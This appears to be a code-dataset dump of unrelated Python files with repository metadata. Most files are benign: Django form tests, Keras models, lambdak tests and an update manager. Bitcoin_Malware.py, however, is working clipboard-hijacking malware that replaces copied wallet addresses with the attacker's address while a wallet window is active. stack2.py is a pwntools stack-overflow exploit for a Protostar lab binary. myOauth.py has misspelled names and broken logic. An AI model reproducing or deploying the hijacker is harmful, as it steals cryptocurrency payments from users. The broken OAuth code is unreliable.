testword = find_word(buffer.lower())
if testword == False:
words_needed.append(items.lower())
main()
for i in words_needed:
print(i) | 20.37037 | 56 | 0.650909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.090909 |
a82e508670c379c3dbb7d2f2e849d1ec9ed6d7a8 | 2,736 | py | Python | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| null | null | null | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| 9 | 2021-07-18T17:16:42.000Z | 2022-03-31T00:19:14.000Z | democrasite/users/tests/test_forms.py | mfosterw/cookiestocracy | 6912e9e7c3006024d0fbee61dce5c48e63e9e231 | [
"MIT"
]
| null | null | null | # pylint: disable=too-few-public-methods,no-self-use
from django.utils.crypto import get_random_string
from django.utils.translation import gettext_lazy as _
from democrasite.users.forms import (
DisabledChangePasswordForm,
DisabledResetPasswordForm,
DisabledResetPasswordKeyForm,
DisabledSetPasswordForm,
UserCreationForm,
)
from democrasite.users.models import User
class TestUserCreationForm:
"""
Test class for all tests related to the UserCreationForm
"""
def test_username_validation_error_msg(self, user: User):
"""
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
"""
# The user already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": user.username,
"password1": user.password,
"password2": user.password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
assert form.errors["username"][0] == _("This username has already been taken.")
class TestDisabledForms:
def test_change_password_form(self, user: User):
password = get_random_string(20)
form = DisabledChangePasswordForm(
data={
"oldpassword": user.password,
"password1": password,
"password2": password,
},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot change your password.")
def test_set_password_form(self, user: User):
password = get_random_string(20)
form = DisabledSetPasswordForm(
data={"password1": password, "password2": password},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot set a password.")
def test_reset_password_form(self, user: User):
form = DisabledResetPasswordForm(data={"email": user.email})
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot reset your password.")
def test_reset_key_password_form(self, user: User):
password = get_random_string(20)
form = DisabledResetPasswordKeyForm(
data={"password1": password, "password2": password},
user=user,
)
assert not form.is_valid()
assert form.errors["__all__"][0] == _("You cannot reset your password.")
| 32.571429 | 87 | 0.623904 | 2,341 | 0.855629 | 0 | 0 | 0 | 0 | 0 | 0 | 798 | 0.291667 |
a82ef552d3bf70dc77e897c13a1b0f9b584ffa9d | 3,359 | py | Python | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| 1 | 2021-05-24T08:00:29.000Z | 2021-05-24T08:00:29.000Z | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| null | null | null | src/keras_networks.py | RU-IIPL/2DLD_keras | 8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf | [
"MIT"
]
| 1 | 2021-09-29T03:43:46.000Z | 2021-09-29T03:43:46.000Z | # -*- coding: utf-8 -*-
"""
@author: Terada
"""
from keras.models import Sequential, Model
from keras.layers import Dense, MaxPooling2D, Flatten, Dropout
from keras.layers import Conv2D, BatchNormalization, ZeroPadding2D, MaxPool2D
from keras.layers import Input, Convolution2D, AveragePooling2D, merge, Reshape, Activation, concatenate
from keras.regularizers import l2
#from keras.engine.topology import Container
def net7(input_size):
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(500, activation='relu'))
model.add(Dense(28))
return model
def lenet(input_size):
model = Sequential()
model.add(Conv2D(20, kernel_size=5, strides=1, activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(2, strides=2))
model.add(Conv2D(50, kernel_size=5, strides=1, activation='relu'))
model.add(MaxPooling2D(2, strides=2))
model.add(Flatten())
model.add(Dense(500, activation='relu'))
model.add(Dense(28)) #activation='softmax'
return model
def alexnet(input_size):
model = Sequential()
model.add(Conv2D(48, 11, strides=3, activation='relu', padding='same', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(128, 5, strides=3, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(128, 3, strides=1, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(28)) #activation='softmax'
return model
def malti_net(input_size):
inputs = Input(shape=(input_size[0], input_size[1], 1))
conv1 = Conv2D(18, (3, 3), activation='relu')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, (3, 3), activation='relu')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(32, (3, 3), activation='relu')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, (3, 3), activation='relu')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
flat1 = Flatten()(pool4)
fc1 = Dense(1000, activation='relu')(flat1)
fc2 = Dense(500, activation='relu')(fc1)
x_main = Dense(28, name='main')(fc2)
x_sub1 = Dense(2, name='sub1', activation='softmax')(fc2)
x_sub2 = Dense(5, name='sub2', activation='softmax')(fc2)
model = Model(inputs=inputs, outputs=[x_main, x_sub1, x_sub2])
return model
| 42.518987 | 122 | 0.677583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 330 | 0.098244 |
a82fdc3cbf4660f5463187cd042910a00705a302 | 9,951 | py | Python | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 19 | 2015-01-13T23:36:23.000Z | 2021-05-29T16:05:05.000Z | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 1 | 2015-11-09T17:23:05.000Z | 2015-11-09T18:48:26.000Z | lambdak_spec.py | yawaramin/lambdak | 5038531f2939dfbbbf94ea859454efaf69bf6487 | [
"MIT"
]
| 3 | 2016-03-26T15:57:36.000Z | 2018-11-30T07:04:03.000Z | from contextlib import closing, contextmanager
import StringIO as s
import unittest as t
from lambdak import *
# A helper class to test attribute access.
class A: pass
# Helper functions for the tests.
def inc(x): return x + 1
def double(x): return x * 2
class test_lambdak(t.TestCase):
def test_init_k_x(self):
args = (1, 2)
lk = lambdak(*args)
self.assertEqual((lk.k, lk.x), (1, (2,)))
def test_init_k(self):
val = 1
lk = lambdak(val)
self.assertEqual((lk.k, lk.x), (val, ()))
class test_call_(t.TestCase):
def test_call_none(self):
self.assertEqual(call_(None), None)
def test_call_func(self):
val = 1
def f(): return val
self.assertEqual(call_(f), val)
class test_do_(t.TestCase):
def setUp(self):
self.a = A()
self.name = "x"
self.val = 1
def test_do_not(self):
"The do_ action shouldn't be carried out unless the lambdak is called."
self.a.x = 2
d = do_(lambda: setattr(self.a, self.name, self.val))
self.assertNotEqual(self.a.x, self.val)
def test_do_1(self):
do_(lambda: setattr(self.a, self.name, self.val))()
self.assertEqual(self.a.x, self.val)
def test_do_2(self):
val2 = 2
do_(lambda: setattr(self.a, self.name, self.val), lambda:
do_(lambda: setattr(self.a, "y", val2)))()
self.assertEqual((self.a.x, self.a.y), (self.val, val2))
class test_given_(t.TestCase):
def test_given_id(self):
val = 1
f = given_(return_)
self.assertEqual(f(val), val)
def test_given_recursion(self):
"Test that tail recursion doesn't stack overflow if it uses lambdak's trampoline system."
factorial = given_(lambda n, acc = 1:
acc if n <= 1
else given_(lambda: factorial.k(n - 1, n * acc)))
try: factorial(1000, 1)
except: self.assertTrue(False)
finally: self.assertTrue(True)
class test_assert_(t.TestCase):
def test_assert_succeed(self):
try:
assert_(True)()
self.assertTrue(True)
except:
self.assertTrue(False)
def test_assert_fail(self):
self.assertRaises(AssertionError, assert_(False))
class test_raise_(t.TestCase):
def setUp(self): self.exn = Exception
def test_raise_last(self):
try: raise self.exn
except: self.assertRaises(self.exn, raise_())
def test_raise_exn_type(self):
self.assertRaises(self.exn, raise_(self.exn))
def test_raise_exn_val(self):
e = Exception("Bad")
self.assertRaises(self.exn, raise_(e))
def test_raise_exn_type_val(self):
msg = "Bad"
e = Exception(msg)
try: raise_(Exception, e)()
except Exception, ee:
self.assertEqual(ee.message, msg)
return
self.assertTrue(False)
class test_cond_(t.TestCase):
def test_cond_val(self):
val = 1
cond_val = cond_(
[ (lambda: True, lambda: val),
(lambda: False, lambda: 2) ],
None)
self.assertEqual(cond_val(), val)
def test_cond_noval(self):
cond_noval = cond_(
[ (lambda: False, lambda: 1) ],
None)
self.assertEqual(cond_noval(), None)
def test_cond_return_effect(self):
"An effect wrapped in a lambdak should be returned from cond_."
a = A()
a.x = 1
attr_name = "x"
val = 2
cond_(
[ (lambda: False, lambda: setattr_(a, attr_name, 0)),
(lambda: True, lambda: setattr_(a, attr_name, val)) ],
None,
return_)()
self.assertEqual(a.x, val)
class test_import_(t.TestCase):
def test_import_math(self):
"Math here is representative of the Python standard library."
pi_floor = import_("math", lambda _: _.floor(_.pi))
self.assertEqual(pi_floor(), 3)
class test_try_(t.TestCase):
def setUp(self): self.a = A()
def test_try_exn(self):
val = 1
try_(lambda: 1 / 0, lambda: setattr(self.a, "x", val))()
self.assertEqual(self.a.x, val)
def test_try_noexn(self):
val = 1
self.a.x = val
try_(lambda: 1, lambda: setattr(self.a, "x", 2))()
self.assertEqual(self.a.x, val)
def test_try_exn_else_finally(self):
"The else_ action should not run if there's an exception."
self.a.x = 1
ex_val = 2
noex_val = 3
try_(lambda: 1 / 0,
except_ = lambda: setattr(self.a, "x", ex_val),
else_ = lambda: setattr(self.a, "x", noex_val),
finally_ =
const_(modattr_(self.a, "x", double)))()
self.assertEqual(self.a.x, double(ex_val))
def test_try_noexn_else_finally(self):
"The else_ action should run if there's no exception."
self.a.x = 1
ex_val = 2
noex_val = 3
try_(lambda: 1,
except_ = lambda: setattr(self.a, "x", ex_val),
else_ = lambda: setattr(self.a, "x", noex_val),
finally_ =
const_(modattr_(self.a, "x", double)))()
self.assertEqual(self.a.x, double(noex_val))
def test_try_exn_retval(self):
"The try_ lambdak should be able to 'return' a result value."
x = try_(
lambda: 1 / 0,
except_ = lambda: 0,
finally_ = return_)()
self.assertEqual(x, 0)
def test_python_try_finally_always(self):
"Python's built-in try statement finally clause should run even if exception occurs and is not caught."
start_val = 0
final_val = 2
try:
try: 1 / 0
except AttributeError: start_val += 1
finally: start_val += 2
except: pass
self.assertEqual(start_val, final_val)
class test_for_(t.TestCase):
def setUp(self):
self.a = A()
def test_for_act(self):
vals = (1, 2, 3)
for_(range(1, 4), lambda _: setattr(self.a, "x%s" % _, _))()
self.assertEqual((self.a.x1, self.a.x2, self.a.x3), vals)
def test_for_break(self):
break_val = 3
for_(range(1, 5), lambda i:
break_ if i == break_val
else setattr(self.a, "x", i))()
self.assertEqual(self.a.x, break_val - 1)
def test_for_continue(self):
skip_val = 3
xs = []
for_(range(1, 5), lambda i:
continue_ if i == skip_val
else xs.append(i))()
self.assertFalse(skip_val in xs)
def test_for_else_break(self):
"The else_ parameter should not run if we break out of the loop."
val = 0
d = { "x": val }
for_else_(range(5), lambda i: break_,
else_ = lambda: mod_("x", inc, d))()
self.assertEqual(d["x"], val)
def test_for_else_nobreak(self):
"The else_ parameter should run if we don't break out of the loop."
val = 0
d = { "x": val }
for_else_(range(5), lambda i: None,
else_ = lambda: mod_("x", inc, d))()
self.assertEqual(d["x"], val + 1)
class test_while_(t.TestCase):
def setUp(self):
self.a = A()
self.a.x = 0
def test_while_expr(self):
val = 10
while_(lambda: self.a.x < val, lambda:
modattr_(self.a, "x", inc))()
self.assertEqual(self.a.x, val)
def test_while_break(self):
break_val = 5
while_(lambda: True, lambda:
break_ if self.a.x == break_val
else modattr_(self.a, "x", inc))()
self.assertEqual(self.a.x, break_val)
def test_while_continue(self):
"Should immediately skip to the next iteration of the loop if an object of type `continue_` is returned from any of the lambdaks inside the `while_` lambdak."
xs = []
skip_val = 2
while_(lambda: self.a.x <= 4, lambda:
modattr_(self.a, "x", inc, lambda:
continue_ if self.a.x == skip_val
else xs.append(self.a.x)))()
self.assertFalse(skip_val in xs)
def test_while_else_break(self):
"Should not run the else_ clause if we break out of the loop."
d = { "x": 0 }
break_val = 2
mult = 2
while_else_(lambda: d["x"] <= 4, lambda:
break_ if d["x"] == break_val
else mod_("x", inc, d),
else_ = lambda: mod_("x", double, d))()
self.assertEqual(d["x"], break_val)
def test_while_else_nobreak(self):
"Should run the else_ clause if we don't break out of the loop."
d = { "x": 0 }
loop_end = 4
while_else_(lambda: d["x"] < loop_end, lambda: mod_("x", inc, d),
else_ = lambda: mod_("x", double, d))()
self.assertEqual(d["x"], double(loop_end))
class test_attr_accessors(t.TestCase):
def setUp(self):
self.a = A()
self.attr_name = "x"
def test_setattr_(self):
val = 1
setattr_(self.a, self.attr_name, val)()
self.assertEqual(self.a.x, val)
def test_delattr_(self):
self.a.x = 1
delattr_(self.a, self.attr_name)()
self.assertFalse(hasattr(self.a, self.attr_name))
def test_modattr_(self):
self.a.x = 1
modattr_(self.a, self.attr_name, inc)()
self.assertEqual(self.a.x, 2)
class test_with_(t.TestCase):
def setUp(self):
self.a = A()
self.a.x = 0
def incr():
self.a.x += 1
yield
self.a.x += 1
self.incr = contextmanager(incr)
self.with_lk = with_(self.incr, lambda: None)
def test_with_ctx_before(self): self.assertEqual(self.a.x, 0)
def test_with_ctx_after(self):
self.with_lk()
self.assertEqual(self.a.x, 2)
def test_with_get_nothing(self):
"If the context manager doesn't bind a value, the handler function shouldn't get an argument."
try: with_(self.incr, lambda: None)()
except:
self.assertTrue(False)
return
self.assertTrue(True)
def test_with_get_val(self):
"If the context manager binds a value, the handler function should get the value as an argument."
try: with_(lambda: closing(s.StringIO()), lambda _: None)()
except:
self.assertTrue(False)
return
self.assertTrue(True)
class test_dict_accessors(t.TestCase):
def setUp(self):
self.k, self.v = "x", 1
self.d = { self.k: self.v }
def test_assign_(self):
val = 2
assign_(self.k, val, self.d)()
self.assertEqual(self.d[self.k], val)
def test_get_(self): self.assertEqual(get_(self.k, self.d), self.v)
def test_del_(self):
del_(self.k, self.d)()
self.assertTrue(self.k not in self.d)
def test_mod_(self):
mod_(self.k, inc, self.d)()
self.assertEqual(self.d[self.k], inc(self.v))
if __name__ == "__main__":
t.main()
| 25.320611 | 162 | 0.633203 | 9,639 | 0.968646 | 206 | 0.020701 | 0 | 0 | 0 | 0 | 1,375 | 0.138177 |
a830be9674eca4b0486b3f40d92cbb270322784c | 2,327 | py | Python | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| 7 | 2019-03-04T14:28:53.000Z | 2022-01-31T12:11:53.000Z | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| null | null | null | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| 4 | 2019-03-04T14:29:01.000Z | 2022-01-31T12:11:40.000Z | # Coded By : Ismael Al-safadi
from win32gui import GetWindowText, GetForegroundWindow
from pyperclip import copy
from re import findall
from win32clipboard import OpenClipboard , GetClipboardData , CloseClipboard
from time import sleep
class BitcoinDroper:
"""
class for spoofing Bitcoin Wallet address .
Methods :
check_active_window : for check active window.
check_bitcoin_wallet : This method will check if the copied data right now
is as Bitcoin Wallet address or not.
return_copied_wallet : this function will return the old address .
spoof_wallet : Function for change address to your.
get_old_wallet : Function for getting the old address .
spoofing_done : Function to show if spoofing done or not .
"""
def __init__(self):
# You can add many of bitcoin wallets names into the list
self.list_of_btc = ['blockchain','exodus','coinbase','electrum' , 'bitcoin','bitstamp']
self.destination_address = "Your Bitcoin address wallet"
self.done = False
def check_active_window(self):
window = (GetWindowText(GetForegroundWindow())[0:44])
window = str(window).lower()
if any(ext in window for ext in self.list_of_btc):
return True
else:
return False
def check_bitcoin_wallet(self):
OpenClipboard()
data = GetClipboardData()
CloseClipboard()
l = findall('[a-zA-Z0-9]{34}', data)
if len(l) == 1:
return True
else:
return False
def return_copied_wallet(self):
copy(self.old_wallet)
def spoof_wallet(self):
copy(self.destination_address)
self.done = True
def get_old_wallet(self):
OpenClipboard()
self.old_wallet = GetClipboardData()
CloseClipboard()
def spoofing_done(self):
return self.done
a = BitcoinDroper()
while True:
if a.check_active_window() and a.check_bitcoin_wallet():
if not a.spoofing_done():
a.get_old_wallet()
a.spoof_wallet()
elif a.spoofing_done():
if a.check_bitcoin_wallet() and not a.check_active_window():
a.return_copied_wallet()
sleep(2)
| 31.026667 | 96 | 0.628277 | 1,733 | 0.744736 | 0 | 0 | 0 | 0 | 0 | 0 | 741 | 0.318436 |
a832641c2261a8791df173a07f00c6ea847b04f1 | 504 | py | Python | Exploits/Protostar/stack/stack2.py | SkyBulk/OSCE | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| 80 | 2018-07-12T04:58:02.000Z | 2022-03-18T11:31:49.000Z | Exploits/Protostar/stack/stack2.py | SunWare-shellcoder/OSCE-1 | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| null | null | null | Exploits/Protostar/stack/stack2.py | SunWare-shellcoder/OSCE-1 | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| 43 | 2018-07-12T19:48:15.000Z | 2021-11-01T13:16:25.000Z | #!/usr/bin/env python
# $Id: stack2.py,v 1.0 2018/06/21 23:12:02 dhn Exp $
from pwn import *
level = 2
host = "10.168.142.133"
user = "user"
chal = "stack%i" % level
password = "user"
binary = "/opt/protostar/bin/%s" % chal
shell = ssh(host=host, user=user, password=password)
padding = "A" * 64
addr = p32(0x0d0a0d0a)
payload = padding
payload += addr
r = shell.run("GREENIE=\"%s\" %s" % (payload, binary))
r.recvuntil("you have correctly modified the variable")
r.clean()
log.success("Done!")
| 20.16 | 55 | 0.656746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 204 | 0.404762 |
a8347276bdea4347d1187329f50e22db158c90b3 | 5,096 | py | Python | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| 4 | 2020-02-13T18:57:41.000Z | 2020-08-03T21:08:26.000Z | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| null | null | null | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| 1 | 2021-06-14T13:42:39.000Z | 2021-06-14T13:42:39.000Z | import urllib.parse, urllib.request,json
import time
import hmac, hashlib,random,base64
#yahoo stuff
#client ID dj0yJmk9S3owYWNNcm1jS3VIJmQ9WVdrOU1HMUZiMHh5TjJNbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD0xOQ--
#client secret ID fcde44eb1bf2a7ff474b9fd861a6fcf33be56d3f
def setConsumerCreds(cons_key,cons_secret):
global consumerKey
global consumerSecret
consumerKey = cons_key
consumerSecret = cons_secret
def set_access_token(key,secret):
global accessToken
global accessTokenSecret
accessToken = key
accessTokenSecret = secret
def get_base_string(resourceUrl, values,method="POST"):
baseString = method+"&"+url_encode(resourceUrl) + "&"
sortedKeys = sorted(values.keys())
for i in range(len(sortedKeys)):
baseString += url_encode(sortedKEys[i] + "=") + url_encode(url_encode(values[sortedKeys[i]]))
if i < len(sortedKeys) - 1:
baseString += url_encode("&")
return baseString
def add_oauth_parameters(parameters, addAccessToken = True):
parameters["oauth_consumer_key"] = consumerKey
if (addAccessToken):
parameters["oauth_token"] = accessToken
parameters["oauth_version"] = "1.0"
parameters["oauth_nonce"] = str(get_nonce())
parameters["oauth_timestamp"] = str(get_timestamp())
parameters["oauth_signature_method"]= "HMAC-SHA1"
def get_nonce():
return random.randint(1,999999999)
def get_timestamp():
return int(time.time())
def get_signature(signingKey,stringToHash):
hmacAlg = hmac.HMAC(signingKey,stringToHash,hashlib.sha1)
return base64.b64encode(hmacAlg.digest())
def url_encode(data):
return urllib.parse.quote(data,"")
def build_oauth_headers(parameters):
header = "OAuth "
sortedKeys = sorted(parameters.keys())
for i in range(len(sortedKeys)):
header = header+ url_encode(sortedKeys[i]) + "=\"" + url_encode(parameters[sortedKeys[i]]) + "\""
if i < len(sortedKeys) - 1:
header = header + ","
return header
##### ACTUAL FUNCTIONS
def get_authorization_url(resourceUrl,endpointUrl,callbackUrl):
oauthParameters = {}
add_oauth_parameters(oauthParameters, False)
oauthParameters["oauth_callback"] = callbackUrl
baseString = get_base_string(resourceUrl,OauthParameters)
signingKey = consumerSecret + "&"
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
headers = build_oauth_headers(oauthParameters)
httpRequest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",headers)
try:
httpResponse = urllib.request.urlopen(httpRequest)
except urllib.request.HTTPError as e:
return "Response: %s" % e.read()
responseData = httpResponse.read()
responseParameters = responseData.split("&")
for string in responseParameters:
if string.find("oauth_token_secret") -1: requestTokenSecret = string.split("=")[1]
elif string.find("oauth_token") -1: requestToken = string.split("=")[1]
return endpointUrl+"?oauth_token="+requestToken
def get_access_token(resourceUrl, requestTok, requestTokSecret, oauth_verifier):
global requestToken,requestTokenSecret,accessToken,accessTokenSecret
requestToken = requestTok
requestTokenSecret = requestTokSecret
oauthParmeters = {"oauth_verfier" : oauth_verifier,"oauth_token":requestToken}
add_oauth_paremeters(oauthParameters,False)
baseString = get_base_string(resourceUrl,oauthParameters)
signingKey = consumerSecret + "&" + requestTokenSecret
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
header = build_oauth_headers(oauthParameters)
httpRquest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
responseParameters = httpResponse.read().split("&")
for string in responseParameters:
if string.find("oauth_token_secret")-1:
accessTokenSecret = string.split("=")[1]
elif string.find("oauth_token")-1:
accessToken = string.split("=")[1]
def get_api_response(resourceUrl,method="POST",parameters={}):
add_oauth_parameters(parameters)
baseString = get_base_string(resourceUrl,parameters,method)
signingKey = consumerSecret + "&" + accessTokenSecret
parameters["oauth_signature"] = get_signature(signingKey,baseString)
parameters2 = {}
for string in sorted(parameters.keys()):
if string.finds("oauth_") == 1:
parameters2[s] = parameters.pop(s)
header = build_oauth_headers(parameters)
httpRequest = urllib.request.Request(resourceUrl,urllib.parse.urlencode(parameters2))
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
respStr = httpResponse.read()
def yqlQuery(query):
baseUrl = "https://query.yahooapis.com/v1/public/yql?"
searchUrl = baseUrl + urllib.parse.quote(query)
result= urllib.request.urlopen(searchUrl).read()
data = json.loads(result)
return data["query"]["results"]
| 41.770492 | 116 | 0.724882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 708 | 0.138932 |
a8347a798c6edcafbe98def909244e3a366c1264 | 5,246 | py | Python | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | [
"MIT"
]
| 9 | 2017-05-27T20:42:46.000Z | 2020-11-12T21:03:28.000Z | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | [
"MIT"
]
| 30 | 2017-02-16T19:43:18.000Z | 2018-01-17T21:17:01.000Z | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | [
"MIT"
]
| 6 | 2017-02-24T03:40:04.000Z | 2020-11-22T20:29:11.000Z |
import os, sys, logging, threading, tempfile, shutil, tarfile, inspect
from ConfigParser import RawConfigParser
import requests
from DXLiquidIntelApi import DXLiquidIntelApi
log = logging.getLogger(__name__)
class UpdateManager:
def __init__(self, liquidApi, packageType, checkUnpublished, packageCheckInterval, configuredInstallDir):
self._liquidApi = liquidApi
# We assume the last segment in the installation directory is the version label
(self._baseInstallDir, self._semanticVersion) = os.path.split(self._getInstallDir(configuredInstallDir))
self._packageType = packageType
self._checkUnpublished = checkUnpublished
self._packageCheckInterval = packageCheckInterval
self._restartRequired = False
# Initial check is synchronous
self.checkForNewVersion()
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if self._timer:
self._timer.cancel()
def checkForNewVersion(self):
self._timer = None
restartTimer = True
log.info('Checking for newer version from package manager api')
packages = self._liquidApi.getInstallationPackages(self._semanticVersion, self._packageType.value, self._checkUnpublished.value)
if len(packages) > 0:
log.info('New installation packages detected: %s', packages)
installPackage = packages[-1]
newInstallDir = os.path.join(self._baseInstallDir, installPackage["Version"])
log.info('Installing package version: %s at: %s. Download location: %s. %s', installPackage["Version"], newInstallDir, installPackage["PackageUri"], installPackage["Description"])
try:
# Download the package
downloadReq = requests.get(installPackage["PackageUri"], stream = True)
downloadReq.raise_for_status()
# Create a new installation directory, using the version label
if os.path.exists(newInstallDir):
log.warning('Installation directory %s already exists - this will overwrite existing contents', newInstallDir)
else:
os.makedirs(newInstallDir)
# Assume package content is .tar.gz - unfortunately we can't stream the response directly into the tar extractor as the
# HTTP response stream doesn't support seek()
with tempfile.NamedTemporaryFile(prefix="package-tarball-", suffix=".tar.gz", delete=False) as fd:
shutil.copyfileobj(downloadReq.raw, fd)
fd.seek(0)
tar = tarfile.open(fileobj=fd)
tar.extractall(newInstallDir)
# Point the symlink to the new directory
if sys.platform != 'win32':
currentSymlink = os.path.join(self._baseInstallDir, 'current')
if os.path.exists(currentSymlink):
os.remove(currentSymlink)
os.symlink(newInstallDir, currentSymlink)
# Check if this version has any configuration that we need to apply locally
if 'Configuration' in installPackage and installPackage['Configuration']:
configFile = os.path.join(newInstallDir, 'IOController.cfg')
log.info('Writing version-specific configuration to: %s', configFile)
config = RawConfigParser()
# Convert from JSON form to .INI form by intepreting all object values as sections
# and all others as primitive values in the parent section
# Top level should be section names with values
for (section, values) in installPackage['Configuration'].items():
if not isinstance(values, dict):
log.warning('Package configuration for keg/section: %s does not contain an object. Non-objects are not supported.', section);
else:
config.add_section(section)
for (setting, value) in values.items():
config.set(section, setting, value)
with open(configFile, 'w') as fd:
config.write(fd)
self._restartRequired = True
# No need to restart the timer as we're bailing on the next main loop iteration
restartTimer = False
except:
log.warning('Failed to download installation package. Will retry on next interval.', exc_info=1)
if restartTimer:
self._timer = threading.Timer(self._packageCheckInterval.value, self.checkForNewVersion)
self._timer.start()
@property
def restartRequired(self):
return self._restartRequired
@property
def semanticVersion(self):
return self._semanticVersion
def _getInstallDir(self, configuredInstallDir):
if configuredInstallDir or sys.platform == 'win32':
return configuredInstallDir
return os.path.dirname(os.path.realpath(inspect.getabsfile(UpdateManager)))
| 51.940594 | 191 | 0.62276 | 5,025 | 0.957873 | 0 | 0 | 154 | 0.029356 | 0 | 0 | 1,372 | 0.261533 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.